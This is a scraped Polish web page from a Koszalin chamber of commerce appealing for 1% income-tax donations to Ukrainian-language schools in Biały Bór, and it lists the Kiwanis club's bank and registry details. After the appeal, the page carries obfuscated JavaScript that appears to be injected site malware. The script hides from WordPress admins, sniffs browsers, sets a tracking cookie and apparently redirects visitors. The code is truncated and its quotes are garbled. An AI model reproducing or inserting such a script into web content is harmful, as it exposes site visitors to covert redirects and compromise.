Zarząd Fundacji DEKA zachęca ludzi dobrej woli do przekazania 1% podatku dochodowego | Północna Izba Gospodarcza w Koszalinie

Polnocna-Izba-Koszalin-zacheca-1%

Zarząd Oddziału w Koszalinie Związku Ukraińców Polsce

Stowarzyszenie KIWANIS International Klub Koszalin

Dyrekcja Zespołu Szkół nr 2 im. Tarasa Szewczenki w Białym Borze

Zarząd Fundacji DEKA

zachęca ludzi dobrej woli do przekazania 1% podatku dochodowego do wsparcia

ZESPOŁU UKRAIŃSKOJĘZYCZNYCH SZKÓŁ W BIAŁYM BORZE ORAZ PUNKTÓW NAUCZANIA JĘZYKA UKRAIŃSKIEGO

wpisując w deklarację podatkową PIT za 2017 rok niżej podane informacje:

STOWARZYSZENIE KIWANIS INTERNATIONAL KLUB KOSZALIN
ul. Zwycięstwa 32, 75-037 Koszalin
Konto: Bank Millenium S.A. nr 34 1160 2202 0000 0000 3295 8076
KRS nr 0000138192
 NIP 669 23 40 671 z dopiskiem: „pomoc na rzecz dzieci ze szkoły w Białym Borze i punktów nauczania„.

'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m